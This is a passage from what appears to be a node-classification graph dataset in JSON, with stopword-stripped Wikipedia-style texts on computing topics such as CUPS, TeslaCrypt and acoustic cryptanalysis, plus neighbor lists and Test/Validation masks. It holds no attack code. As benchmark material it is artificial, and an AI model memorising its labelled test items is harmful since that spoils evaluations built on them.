    "text": "Data_Protection_Act_2018:data protection act 2018 data protection act 2018 c 12 united kingdom act parliament updates data protection laws uk national law complements european union general data protection regulation gdpr updates data protection act 1998 data protection act 2018 achieved royal assent 23 may 2018 applies eu gdpr standards whereas gdpr gives member states limited opportunities make provisions applies country one element dpa 2018 details applying national law dpa 2018 however limited uk gdpr provisions act seven parts outlined section 1 act introduces new offences include knowingly recklessly obtaining disclosing personal data without consent data controller procuring disclosure retaining data obtained without consent selling offering sell personal data knowingly recklessly obtained disclosed would also offence essentially act implements eu law enforcement directive implements parts gdpr 'are determined member state law creates framework similar gdpr processing personal data outside scope gdpr includes intelligence services processing immigration services processing processing personal data held unstructured form public authorities section 3 european union withdrawal act 2018 gdpr incorporated directly domestic law immediately uk exits european union",
    "neighbors": [
      3858,
      5133,
      9901
    ],
    "mask": "Test"
  },
  {
    "node_id": 7624,
    "label": 4,
    "text": "Smudge_attack:smudge attack smudge attack method discern password pattern touchscreen device cell phone tablet computer method investigated team university pennsylvania researchers reported 4th usenix workshop offensive technologies smudge attack relies detecting oily smudges left behind user fingers operating device using simple cameras image processing software proper lighting camera settings finger smudges easily detected heaviest smudges used infer frequent user input pattern password researchers able break password 68 time proper conditions research widely covered technical press including reports pc pro zdnet engadget threat recognized least one product introduced whisper systems mitigate risk",
    "neighbors": [
      3810,
      6916,
      9356,
      2558,
      8671
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7625,
    "label": 4,
    "text": "GoGuardian:goguardian goguardian founded 2014 based los angeles ca offer four core products including goguardian admin web filtering goguardian teacher classroom management goguardian fleet chrome device management goguardian beacon suicide self harm alerting services enable school administrators monitor student activity online filter potentially harmful distracting content help students need june 2018 goguardian claimed active 10,150 schools protect five million students 2018 goguardian named fastest growing education company inc 500 goguardian founded 2014 based los angeles ca feature set includes chromebook filtering monitoring management well usage analytics activity flagging theft recovery device running chrome operating system chrome os goguardian also offers filtering functionality third-party tools youtube services enable school administrators monitor student activity online filter potentially harmful distracting content recover lost stolen devices june 2015 goguardian claimed active 1,600 estimated 15,000 school districts united states january 2015 los angeles unified school district lausd chose goguardian support 1:1 device rollout program 661,000 students chromebooks one device options lausd 1:1 rollout partnership provides lausd device tracking grade-level-specific filtering capabilities facilitates compliance children internet protection act cipa september 2015 company unveiled goguardian teachers tool designed help teachers manage chromebook usage classrooms monitor student activity device goal tool help keep students on-task away inappropriate content january 2016 goguardian announced launch google classroom integration goguardian teachers january 2016 two company co-founders aza steel advait shinde named forbes magazine annual 30 30 list education category 2018 goguardian launched beacon suicide prevention tool aimed help school counselors discover students silently suffering based online activity behavior 2018 goguardian acquired private equity firm sumeru equity partners appointed tony miller board directors afsp 2018 goguardian partnered american foundation suicide prevention provide free prevention training schools https //www.businesswire.com/news/home/20180904005255/en/american-foundation-suicide-prevention-partners-goguardian-provide aas 2017 goguardian announced partnership american association suicidology help tackle youth suicide crisis every school purchases beacon receive on-site sad training free charge http //www.businesswire.com/news/home/20170911005211/en/goguardian-american-association-suicidology-join-forces-tackle google education partner https //edu.google.com/products/classroom/apps/ modal_active=none story-card_activeel=connect-with-school-systems global educator institute endorsed goguardian teacher http //geiendorsed.com/products/goguardian/",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7626,
    "label": 2,
    "text": "CUPS:cups cups formerly acronym common unix printing system modular printing system unix-like computer operating systems allows computer act print server computer running cups host accept print jobs client computers process send appropriate printer cups consists print spooler scheduler filter system converts print data format printer understand backend system sends data print device cups uses internet printing protocol ipp basis managing print jobs queues also provides traditional command line interfaces system v berkeley print systems provides support berkeley print system line printer daemon protocol limited support server message block smb protocol system administrators configure device drivers cups supplies editing text files adobe postscript printer description ppd format number user interfaces different platforms configure cups built-in web-based interface cups free software provided apache license michael sweet owned easy software products started developing cups 1997 first public betas appeared 1999 original design cups used line printer daemon protocol lpd protocol due limitations lpd vendor incompatibilities internet printing protocol ipp chosen instead cups quickly adopted default printing system linux distributions march 2002 apple inc. adopted cups printing system mac os x 10.2 february 2007 apple inc. hired chief developer michael sweet purchased cups source code cups provides mechanism allows print jobs sent printers standard fashion print-data goes scheduler sends jobs filter system converts print job format printer understand filter system passes data backend —a special filter sends print data device network connection system makes extensive use postscript rasterization data convert data format suitable destination printer cups offers standard modularised printing system process numerous data formats print server cups difficult find standard printer management system would accommodate wide variety printers market using printer languages formats instance system v berkeley printing systems largely incompatible required complicated scripts workarounds convert program data format printable format often could detect file format sent printer thus could automatically correctly convert data stream additionally data conversion performed individual workstations rather central server cups allows printer manufacturers printer-driver developers easily create drivers work natively print server processing occurs server allowing easier network-based printing unix printing systems samba installed users address printers remote windows computers generic postscript drivers used printing across network cups scheduler implements internet printing protocol ipp http/1.1 helper application cups-lpd converts line printer daemon protocol lpd requests ipp scheduler also provides web-based interface managing print jobs configuration server documentation cups authorization module controls ipp http messages pass system ipp/http packets authorized sent client module listens processes incoming connections client module also responsible executing external cgi programs needed support web-based printers classes job status monitoring administration module processed requests sends ipp module performs uniform resource identifier uri validation prevent client sidestepping access controls authentication http server uri text string indicates name address used refer abstract physical resource network scheduler allows classes printers applications send requests groups printers class allowing scheduler direct job first available printer class jobs module manages print jobs sending filter backend processes final conversion printing monitoring status messages processes cups scheduler utilizes configuration module parses configuration files initializes cups data structures starts stops cups program configuration module stop cups services configuration file processing restart service processing complete logging module handles logging scheduler events access error page log files main module handles timeouts dispatch i/o requests client connections watching signals handling child process errors exits reloading server configuration files needed modules used scheduler include cups process variety data formats print server converts print-job data final language/format printer via series filters uses mime types identifying file formats cups system assigned print job scheduler passed cups filter system converts data format suitable printer start-up cups daemon loads two mime databases codice_1 defines known file types cups accept data codice_2 defines programs process particular mime type codice_1 file syntax codice_4 example detect html file following entry would applicable codice_5 second line matches file contents specified mime type determining first kilobyte text file holds printable characters characters include html markup pattern matches filter system would mark file mime type text/html codice_2 file syntax codice_8 source field designates mime type determined looking codice_1 file destination field lists type output requested determines program used also retrieved codice_1 cost field assists selection sets filters converting file last field program determines filter program use perform data conversion examples filtering process works taking input data pre-formatted six arguments determines type data input filter used use mime databases instance image data detected processed particular filter html data detected processed another filter cups convert supplied data either postscript data directly raster data converted postscript data additional filter applied called prefilter runs postscript data another postscript converter add printer specific options like selecting page ranges print setting n -up mode device-specific things pre-filtering done data either sent directly cups backend using postscript printer passed another filter like foomatic linuxprinting.org alternatively passed ghostscript converts postscript intermediary cups-raster format intermediary raster format passed onto final filter converts raster data printer-specific format default filters included cups include however several alternatives integrate cups hplip previously known hp-ijs provides linux+cups drivers hp printers gutenprint previously known gimp-print range high-quality printer drivers mostly inkjet printers turboprint linux another range quality printer drivers wide range printers backends ways cups sends data printers several backends available cups parallel serial usb ports cups-pdf pdf virtual printing well network backends operate via ipp jetdirect appsocket line printer daemon lpd smb protocols new codice_11 backend cups 1.4 provides bonjour dns-sd based printer discovery cups 1.6 bonjour printer discovery sharing using avahi also supported cups provides system v berkeley printing commands users continue traditional commands printing via cups cups uses port 631 tcp udp standard ipp port optionally port 515 inetd launchd solaris service management facility xinetd use cups-lpd helper program support lpd printing cups installed codice_12 system v printing system command codice_13 berkeley printing system commands installed compatible programs allows standard interface cups allows maximum compatibility existing applications rely printing systems several tools exist help set cups platforms cups web-based administration interface runs port 631 particularly helps organisations need monitor print jobs add print queues printers remotely cups 1.0 provided simple class job printer-monitoring interface web browsers cups 1.1 replaced interface enhanced administration interface allows users add modify delete configure control classes jobs printers cups 1.2 later provide revamped web interface features improved readability design support automatically discovered printers better access system logs advanced settings gnome print settings formerly called cups manager add new cups printers manage cups printers queues gnome widget toolkit gtk+ included integrated printing support based cups version 2.10 released 2006 ubuntu accessed graphical menu system administration printing kdeprint framework kde contains various gui-tools act cups front-ends allows administration classes print queues print jobs includes printer wizard assist adding new printers amongst features kdeprint first appeared kde 2.2 kdeprint supports several different printing platforms cups one best-supported replaced previous version printing support kde qtcups backwards compatible module kde kprinter dialogue-box program serves main tool sending jobs print device also started command line kdeprint includes system pre-filter jobs handed cups handle jobs converting files pdf filters described pair desktop/xml files kdeprint main components include mac os x 10.5 printers configured print fax panel system preferences printer proxy applications display print queues allow additional configuration printers set earlier versions mac os x also included printer setup utility supplied configuration options missing earlier versions print fax preference pane printersetup system manage cups queues takes approach assigning text file describe print queue 'printersetupfiles may added text files called 'printersetuplists allows logical grouping printers printersetup project remains infancy starting red hat linux 9 red hat provided integrated print manager based cups integrated gnome allowed adding printers via user interface similar one microsoft windows uses new printer could added using add new printer wizard along changing default printer-properties window containing list installed printers jobs could also started stopped using print manager printer could paused using context menu pops printer icon right-clicked eric raymond criticised system piece luxury ignorance raymond attempted install cups using fedora core 1 print manager found non-intuitive criticised interface designers designing user point-of-view mind found idea printer queues obvious users create queues local computer queues actually created cups server also found plethora queue type options confusing could choose networked cups ipp networked unix lpd networked windows smb networked novell ncp networked jetdirect found help file singularly unhelpful largely irrelevant user needs raymond used cups general topic show user interface design linux desktops needs rethinking careful design stated meta-problem configuration wizard approved rituals gui standardized clicky buttons help popping browser etc etc n't central attribute supposed achieve discoverability quality every point interface prompts actions attached learn next project quality easy software products original creators cups created gui provided support many printers implemented postscript rip esp print pro ran windows unix linux longer available support product ended december 31 2007 cups initially called common unix printing system name shortened cups beginning cups 1.4 due legal concerns unix trademark",
    "neighbors": [
      8832,
      3969,
      514,
      7554,
      10885,
      3974,
      3976,
      4490,
      780,
      6797,
      10255,
      7696,
      8977,
      5397,
      1177,
      2462,
      546,
      1699,
      4002,
      6693,
      3750,
      8360,
      8877,
      6830,
      7983,
      2864,
      2737,
      8627,
      8628,
      2485,
      5433,
      9418,
      9035,
      3916,
      1101,
      8909,
      10960,
      6993,
      8147,
      1877,
      10967,
      10971,
      8414,
      479,
      5343,
      10851,
      3685,
      9320,
      4457,
      10352,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7627,
    "label": 9,
    "text": "Expression_(computer_science):expression computer science expression programming language combination one constants variables operators functions programming language interprets according particular rules precedence association computes produce return stateful environment another value process mathematical expressions called evaluation simple settings resulting value usually one various primitive types numerical string logical complex data type many others example codice_1 arithmetic programming expression evaluates codice_2 variable expression denotes value memory codice_3 expression example relational expression codice_4 evaluates codice_5 c c-derived languages call function void return type valid expression type void values type void used value expression always thrown away many programming languages function hence expression containing function may side effects expression side effects normally property referential transparency many languages e.g c++ expressions may ended semicolon codice_6 turn expression expression statement asks implementation evaluate expression side-effects disregard result expression e.g x+1 unless part expression statement induces side-effects e.g y=x+1 func1 func2 note formal notion side effect change abstract state running program another class side effects changes concrete state computational system loading data cache memories languages often described side effect–free generally still concrete side effects exploited example side-channel attacks furthermore elapsed time evaluating expression even one apparent side effects sometimes essential correct operation system behaviour time easily visible outside evaluation environment parts system interacts might even regarded primary effect performing benchmark testing depends particular programming language specification whether expression abstract side effects legally eliminated execution path processing environment expression evaluated",
    "neighbors": [
      256,
      3462,
      8582,
      6536,
      9482,
      10389,
      3991,
      2456,
      9497,
      8221,
      9245,
      1568,
      10145,
      8226,
      4389,
      5415,
      9385,
      944,
      1841,
      5168,
      7609,
      10043,
      7612,
      6718,
      963,
      8262,
      10571,
      7373,
      7386,
      4572,
      477,
      3045,
      10469,
      8554,
      9454,
      10097,
      502,
      6775,
      2936,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7628,
    "label": 7,
    "text": "Cloudify:cloudify cloudify open source software cloud nfv orchestration product originally created gigaspaces technologies spun company cloudify uses oasis tosca technology written python programming language licensed apache license version 2.0 source files found forked github built yaml dsl domain specific language configuration files called blueprints define application configurations services tier dependencies cloudify automates deployment phases applications cloud computing virtualization infrastructure blueprints describe application interacts data center apis execute defined blueprint configurations blueprint files describe execution plans lifecycle application installing starting terminating orchestrating monitoring application stack cloudify uses blueprint input describes deployment plan responsible executing cloud environments blueprint also employs cloud driver configuration files well describe machines images chosen cloud making possible manage infrastructure code component describes location binaries installation monitoring configurations creating abstraction layer isolates code underlying infrastructure cloudify able support cloud cloudify also supports configuration management tools like chef puppet ansible application deployment phase method deploying configuring application services cloudify mentioned marketing publications including venturebeat cloudbeat showdown 2011 crn 20 coolest cloud platforms development vendors 2012 2014 2018 2012 sd times 100 software development superfecta cloud leader recognized frost sullivan 2015 global frost sullivan award new product innovation cloudify together vmware athonet 2016 “ best show ” award tokyo interop event demonstration fastest simplest cloud-based deployment virtualized lte mobile packet core volte service cloudify featured breakdown nfv orchestration platforms mirantis emerged mature orchestration solution among reviewed platforms agile reference implementation automation aria open source mano group spawned cloudify “ mano software year ” network virtualization industry 2016 awards cloudify awarded 2017 layer123 network transformation award best vcpe/ucpe enterprise service cloud carrier service category cloudify member various collaborative projects open source communities cloudify used open-o vmware deutsche telekom orange within opnfv metaswitch proximus telstra partner communications mavenir among others cloudify also founding platinum member onap",
    "neighbors": [
      11393,
      4802,
      4194,
      6153,
      8554,
      4011,
      2795,
      11221,
      253,
      7198
    ],
    "mask": "None"
  },
  {
    "node_id": 7629,
    "label": 2,
    "text": "Windows_Runtime_XAML_Framework:windows runtime xaml framework 'windows runtime xaml framework code name jupiter user interface api part windows runtime winrt programming model forms backbone windows store apps formerly known metro-style immersive windows 8 windows 8.1 windows phone 8.1 operating systems enables declaring user interfaces using extensible application markup language xaml technology xaml framework one multiple ui apis windows runtime others html5 e.g. via winjs directx windows phone 8.0 windows runtime xaml framework supported xaml applications based silverlight xaml framework deployed xap format windows phone 8.1 windows runtime xaml available along improved windows runtime support convergence platforms enable universal apps target windows 8.1 windows phone 8.1 sharing code including user interface windows phone 8.1 still capable running silverlight based xaml apps new features api also added framework called silverlight 8.1 xaml framework related windows presentation foundation wpf silverlight—similar xaml-based ui frameworks used desktop applications portable applications respectively xaml framework uses lot names apis older technologies—especially silverlight use limited windows os specifically windows 8 later wpf major difference silverlight wpf largely based common language runtime clr require using programming languages c visual basic xaml framework part windows runtime written native code also available tools development c++ c++/cx",
    "neighbors": [
      10243,
      2062,
      10769,
      9234,
      1043,
      9245,
      3102,
      1055,
      2083,
      8227,
      1577,
      2603,
      5165,
      5677,
      3631,
      4143,
      9263,
      11316,
      1077,
      8246,
      576,
      8771,
      4174,
      4178,
      9813,
      10841,
      603,
      2145,
      2658,
      5743,
      8303,
      2673,
      8304,
      1656,
      9848,
      5754,
      7292,
      9340,
      1664,
      5761,
      1666,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3734,
      3224,
      4771,
      7846,
      4777,
      10414,
      11442,
      692,
      8391,
      214,
      4822,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      10470,
      9448,
      1770,
      11498,
      5356,
      3821,
      9964,
      10991,
      10480,
      2804,
      7421,
      5380,
      6927,
      9491,
      1812,
      5401,
      5913,
      11546,
      4384,
      3876,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      5952,
      1347,
      1348,
      844,
      8524,
      847,
      10079,
      11616,
      8554,
      9579,
      364,
      5492,
      2943,
      3462,
      8582,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      9128,
      8618,
      6584,
      2493,
      8644,
      4550,
      479,
      8161,
      6114,
      5612,
      9196,
      4590,
      11247,
      3573,
      10229,
      2045,
      9726,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7630,
    "label": 9,
    "text": "Roger_Hui:roger hui roger hui born 1953 computer scientist codeveloper programming language j 1953 born hong kong 1966 immigrated canada whole family 1973 hui entered university alberta second year took course probability statistics students expected learn programming language apl little formal instruction used time could muster heavily-burdened computer benefited apl\\360 user manual book apl language published march 1975 manual written adin falkoff kenneth e. iverson hui thinks reasonable say learned apl falkoff iverson summer student 1975 1976 hui worked i. p. sharp associates ipsa calgary workspaces statistical probability calculations major attraction job unrestricted computer time access apl receiving b.sc degree first class honors computer science 1977 hui worked two years full-time programmer analyst new edmonton office ipsa main duty support clients use apl time-sharing attended apl79 conference rochester new york iverson gave two papers role operators apl derivative operator way hui stopped ipsa toronto obtained copy operators functions ibm research report 7091 1978 studying paper successors ever since september 1979 hui entered department computer science university toronto received m.sc may 1981 thesis complexity decompositions matrix algebra completing master degree hui worked 1981 1985 apl systems analyst programmer alberta energy company edmonton february 1982 hui purchased source book apl 1981 memorable papers design apl 1973 evolution apl 1978 notation tool thought 1980 hui work described apl85 conference paper design financial modelling system written jointly supervisor fred appleyard basic objects system direct definition iverson 1976 1980 falkoff iverson design apl cited hui left alberta energy shortly promoted non-apl non-programming position work access computers september 1985 april 1986 gave plenty time intense study iverson rationalized apl 1983 dictionary apl language named early 1990s ken iverson hui began collaborating advanced continuation apl-like language named j improvements intended fix persistent character set issues plagued apl since inception add new advanced features support parallel multiple instruction multiple data mimd operations intended j language improvement extant apl j interpreter language continue evolve 1996 received kenneth e. iverson award outstanding contribution apl",
    "neighbors": [
      9993,
      1178,
      8987,
      667,
      10668,
      4921,
      9019,
      11075,
      8262,
      1099,
      2519,
      1883,
      11099,
      9825,
      11625,
      4331,
      2670,
      9714,
      8695,
      505,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 7631,
    "label": 3,
    "text": "List_of_ARM_microarchitectures:list arm microarchitectures list microarchitectures based arm family instruction sets designed arm holdings 3rd parties sorted version arm instruction set release name arm provides summary numerous vendors implement arm cores design keil also provides somewhat newer summary vendors arm based processors arm provides chart displaying overview arm processor lineup performance functionality versus capabilities recent arm core families dhrystone synthetic benchmark developed 1980s longer representative prevailing workloadsuse caution cores implement arm instruction set developed independently companies architectural license arm following table lists core year announced cores arm7 n't included table",
    "neighbors": [
      7170,
      2574,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      7218,
      8250,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      8815,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      1170,
      6296,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      1722,
      8383,
      10945,
      9928,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6926,
      5417,
      2862,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      8551,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      3470,
      6033,
      1428,
      4508,
      5028,
      7077,
      9638,
      1461,
      3511,
      8125,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      5598,
      9182,
      10734,
      2549,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7632,
    "label": 8,
    "text": "Path_analysis_(computing):path analysis computing path analysis analysis path portrayal chain consecutive events given user cohort performs set period time using website online game ecommerce platform subset behavioral analytics path analysis way understand user behavior order gain actionable insights data path analysis provides visual portrayal every event user cohort performs part path set period time possible track user ’ path site even show path visual representation real question gain actionable insights path analysis simply outputs pretty graph may look nice provide anything concrete act upon order get path analysis first step would determine needs analyzed goals analysis company might trying figure site running slow certain types users interested certain pages products user interface set logical way goal set ways performing analysis large percentage certain cohort people ages 18-25 logs online game creates profile spends next 10 minutes wandering around menu page may user interface logical seeing group users following path developer able analyze data realize creating profile “ play game ” button appear thus path analysis able provide actionable data company act fix error ecommerce path analysis help customize shopping experience user looking products customers certain cohort looked buying one company suggest “ items may also like ” next customer increase chances making purchase also path analysis help solve performance issues platform example company looks path realizes site freezes certain combinations events analyzing path progression events led error company pinpoint error fix historically path analysis fell broad category website analytics related analysis paths websites path analysis website analytics process determining sequence pages visited visitor session prior desired event visitor purchasing item requesting newsletter precise order pages visited may may important may may specified practice analysis done aggregate ranking paths sequences pages visited prior desired event descending frequency use idea determine features website encourage desired result fallout analysis subset path analysis looks black holes site paths lead dead end frequently paths features confuse lose potential customers advent big data along web-based applications online games ecommerce platforms path analysis come include much web path analysis understanding users move app game web platform part modern-day path analysis real world visit shop shelves products placed random order shop owner carefully analyzes visitors path walk shop especially selecting buying products next shop owner reorder shelves products optimize sales putting everything logical order visitors supermarket typically result wine shelf next variety cookies chips nuts etc simply people drink wine eat nuts web sites logic applied visitors questions product go product information support section web site make logical step frequently asked questions page specific question web site owner also wants analyze visitor behavior example web site offers products sale owner wants convert many visitors completed purchase sign-up form multiple pages web site owners want guide visitors final sign-up page path analysis answers typical questions like visitors go enter home page strong visitor relation product product b web site questions ca n't answered page hits unique visitors statistics google analytics provides path function funnels goals predetermined path web site pages specified every visitor walking path goal approach helpful analyzing many visitors reach certain destination page called end point analysis paths visitors walk web site lead endless number unique paths result point analyzing path look strongest paths strongest paths typically shown graphical map text like page -- page b -- page -- exit",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 7633,
    "label": 4,
    "text": "TeslaCrypt:teslacrypt teslacrypt ransomware trojan defunct master key released developers early forms teslacrypt targeted game-play data specific computer games newer variants malware also affect file types original game-player campaign upon infection malware searched 185 file extensions related 40 different games include call duty series world warcraft minecraft world tanks encrypted files files targeted involve save data player profiles custom maps game mods stored victim hard drives newer variants teslacrypt focused computer games alone also encrypted word pdf jpeg files cases victim would prompted pay ransom 500 worth bitcoins order obtain key decrypt files although resembling cryptolocker form function teslacrypt shares code cryptolocker developed independently malware infected computers via angler adobe flash exploit even though ransomware claimed teslacrypt used asymmetric encryption researchers cisco talos group found symmetric encryption used developed decryption tool deficiency changed version 2.0 rendering impossible decrypt files affected teslacrypt-2.0 november 2015 security researchers kaspersky quietly circulating new weakness version 2.0 carefully keeping knowledge away malware developer could fix flaw january 2016 new version 3.0 discovered fixed flaw full behavior report shows behaviorgraphs executiongraphs published joesecurity may 2016 developers teslacrypt shut ransomware released master decryption key thus bringing end ransomware days eset released public tool decrypt affected computers charge",
    "neighbors": [
      131,
      10756,
      6797,
      7983,
      1970,
      535,
      7515,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 7634,
    "label": 9,
    "text": "Attribute_grammar:attribute grammar attribute grammar formal way define attributes productions formal grammar associating attributes values evaluation occurs nodes abstract syntax tree language processed parser compiler attributes divided two groups synthesized attributes inherited attributes synthesized attributes result attribute evaluation rules may also use values inherited attributes inherited attributes passed parent nodes approaches synthesized attributes used pass semantic information parse tree inherited attributes help pass semantic information across instance constructing language translation tool compiler may used assign semantic values syntax constructions also possible validate semantic checks associated grammar representing rules language explicitly imparted syntax definition attribute grammars also used translate syntax tree directly code specific machine intermediate language one strength attribute grammars transport information anywhere abstract syntax tree anywhere else controlled formal way attribute grammars invented donald knuth peter wegner donald knuth credited overall concept peter wegner invented inherited attributes conversation knuth embryonic ideas trace back work edgar t. ned irons author imp following simple context-free grammar describe language made multiplication addition integers following attribute grammar used calculate result expression written grammar note grammar uses synthesized values therefore s-attributed grammar synthesized attribute computed values attributes children since values children must computed first example bottom-up propagation formally define synthesized attribute let formula_1 formal grammar given string nonterminal symbols formula_6 attribute name formula_7 formula_8 synthesized attribute three conditions met inherited attribute node parse tree defined using attribute values parent siblings inherited attributes convenient expressing dependence programming language construct context appears example use inherited attribute keep track whether identifier appears left right side assignment order decide whether address value identifier needed contrast synthesized attributes inherited attributes take values parent and/or siblings following production get values b c. b take values c. likewise c take values b",
    "neighbors": [
      2307,
      1672,
      10762,
      2316,
      9871,
      1552,
      2065,
      5399,
      11679,
      1952,
      3876,
      2086,
      7876,
      10703,
      2256,
      2650,
      2144,
      9062,
      10474,
      2798,
      2675
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7635,
    "label": 4,
    "text": "Acoustic_cryptanalysis:acoustic cryptanalysis acoustic cryptanalysis type side channel attack exploits sounds emitted computers devices modern acoustic cryptanalysis focuses sounds produced computer keyboards internal computer components historically also applied impact printers electromechanical deciphering machines victor marchetti john d. marks eventually negotiated declassification cia acoustic intercepts sounds cleartext printing encryption machines technically method attack dates time fft hardware cheap enough perform task—in case late 1960s mid-1970s however using primitive means acoustical attacks made mid-1950s book spycatcher former mi5 operative peter wright discusses use acoustic attack egyptian hagelin cipher machines 1956 attack codenamed engulf 2004 dmitri asonov rakesh agrawal ibm almaden research center announced computer keyboards keypads used telephones automated teller machines atms vulnerable attacks based sounds produced different keys attack employed neural network recognize key pressed analyzing recorded sounds able recover text data entered techniques allow attacker using covert listening devices obtain passwords passphrases personal identification numbers pins information entered via keyboards 2005 group uc berkeley researchers performed number practical experiments demonstrating validity kind threat also 2004 adi shamir eran tromer demonstrated may possible conduct timing attacks cpu performing cryptographic operations analyzing variations acoustic emissions analyzed emissions ultrasonic noise emanating capacitors inductors computer motherboards electromagnetic emissions human-audible humming cooling fan shamir tromer along new collaborator daniel genkin others went successfully implement attack laptop running version gnupg rsa implementation using either mobile phone located close laptop laboratory-grade microphone located 4 away published experimental results december 2013 acoustic emissions occur coils capacitors small movements current surge passes capacitors particular change diameter slightly many layers experience electrostatic attraction/repulsion piezoelectric size change coil capacitor emits acoustic noise conversely also microphonic high-end audio industry takes steps coils capacitors reduce microphonics emissions muddy hi-fi amplifier sound march 2015 made public inkjet printers using ultrasonic heads read back using high frequency mems microphones record unique acoustic signals nozzle using timing reconstruction known printed data confidential 12-point font thermal printers also read using similar methods less fidelity signals bursting bubbles weaker hack also involved implanting microphone chip storage ic burst transmitter long-life li+ battery doctored cartridges substituted genuine ones sent post target typically bank retrieved garbage using challenge-response rfid chip similar work reconstructing printouts made dot-matrix printers publicized 2011 kind cryptanalysis defeated generating sounds spectrum form keypresses sounds actual keypresses randomly replayed may possible totally defeat kinds attacks advisable use least 5 different recorded variations 36 x 5 180 variations keypress get around issue fft fingerprinting alternatively white noise sufficient volume may simpler generate playback also mask acoustic emanations individual keypresses",
    "neighbors": [
      2050,
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      8978,
      660,
      1173,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      9528,
      9541,
      10315,
      6863,
      8273,
      10963,
      212,
      9556,
      2265,
      7643,
      9697,
      7527,
      618,
      1898,
      7151,
      1776,
      881,
      7794,
      1654,
      7161,
      7034,
      3323,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 7636,
    "label": 3,
    "text": "Enterprise_interoperability:enterprise interoperability enterprise interoperability ability enterprise—a company large organization—to functionally link activities product design supply chains manufacturing efficient competitive way research interoperability enterprise practised various domains enterprise modelling ontologies information systems architectures platforms question positioning enterprise architecture ea presents high level design enterprise capabilities defines successful projects coherence enterprise principals business related requirements ea covers mainly business capabilities analysis validation ii development business application data technical architectures solutions finally iii control programme project implementation governance application ea methodology feeds enterprise repository reference frame sets building blocks used compose targeted system interoperability considered either principal requirement constraint impact definition patterns compose building blocks definition targeted architectural roadmap scope ea within togaf perspective aims reconcile interoperability requirements potential solutions make developed systems interoperable maintain interoperability challenge quite present next steps system ’ lifecycle several models frameworks developed topic enterprise interoperability preserve interoperability several enterprise interoperability frameworks identified literature majority frameworks considers enterprise several aspects viewpoints abstraction levels business process knowledge application technology data technic etc proposes guidelines support modeling connection capabilities levels semantic challenge considered transversal abstraction levels setting applying guidelines methodologies developed within frameworks requires modeling efforts identify connect artifacts evolution technologies aims outsource capabilities vendors manage use demand evolution pathway starts form packaged solutions goes infrastructure service iaas platform service paas software service saas recently cloud interoperability efforts still mainly expected among levels dealing business process definition alignment collaboration interoperability several international standards propose methodologies guidelines perspectives addition recent standards bpmn bpel etc implementation technologies propose relevant integration capabilities furthermore model driven-engineering provides capabilities connect transform refine models support interoperability following approaches propose metrics assess interoperability maturity several interoperability aspects identified previously listed maturity approaches define interoperability categories dimensions propose qualitative well qualitative cross cutting issues assess interoperability aspects covered single maturity approach propositions go deeply definition metric dimensions one interoperability aspect business interoperability measurement proposed aneesh",
    "neighbors": [
      2948,
      5005
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7637,
    "label": 7,
    "text": "Aventri:aventri aventri formerly known etouches cloud-based event management software company based norwalk connecticut best known integrated events management saas solutions company 1,200 users spanning 35 countries worldwide large corporations like coca-cola mastercard dell part client mix aventri five-time honoree inc. magazine inc. 5,000 ranking fastest-growing private companies america 2012 – 2016 annual ranking also places aventri among top companies connecticut aventri founded global executive business service 1998 leonora valvo tim cummins business operated fee-for-service event managing company 2008 company relaunched etouches year etouches introduced first event management solution 2010 company raised 2.5 million first round venture capital investments lead investor greycroft partners investors connecticut innovations cava capital growth continued 2012 company launched mobile application emobile enabling users create manage event scheduling smartphones application integrates etouches modules including ereg esocial also year etouches received 7.75 million series b financing led level equity etouches raised 6 million series c round investments 2013 september year company appointed oni chukwu president chief executive officer veteran software industry executive sits board directors connecticut technology council board governors university new haven.the momentum continued throughout 2015. etouches expanded operations middle east opening headquarters office dubai company raised 14 million series c funding investors including argentum group also year etouches expanded platform acquisition tapcrowd company creates mobile applications provides marketing data businesses associations worldwide new partnership integrated ingo social media marketing suite etouches event management platform company also acquired inevention venue sourcing platform estimating tool help planners manage cost offsite meetings events rapid growth earned etouches spot deloitte 2015 technology fast 500 list fastest-growing technology companies north america also year smartceo magazine honored chukwu new york future 50 award recognizing region fastest-growing mid-sized companies etouches continued develop end-to-end event management platform enterprise market throughout 2016 company closed 20 million funding round later year acquired venue sourcing booking platform zentila etouches also introduced event roi product etouches also integrates directly popular software including salesforce passkey march 2 2017 etouches acquired loopd leading onsite data-drive technology acquisition complements etouches focus data-driven approach enhance clients event success positions etouches full enterprise solution two months later may 9 2017 etouches acquired hggc leading middle market private equity firm hggc ’ investment helped etouches expand business invest market-leading cloud platform win greater share 6 billion event management software ems venue sourcing market july 12 2018 company rebranded aventri aventri headquartered norwalk connecticut offices throughout north america europe middle east asian pacific company offers multilingual multi-currency product versions accommodate global customer base",
    "neighbors": [
      1400,
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 7638,
    "label": 7,
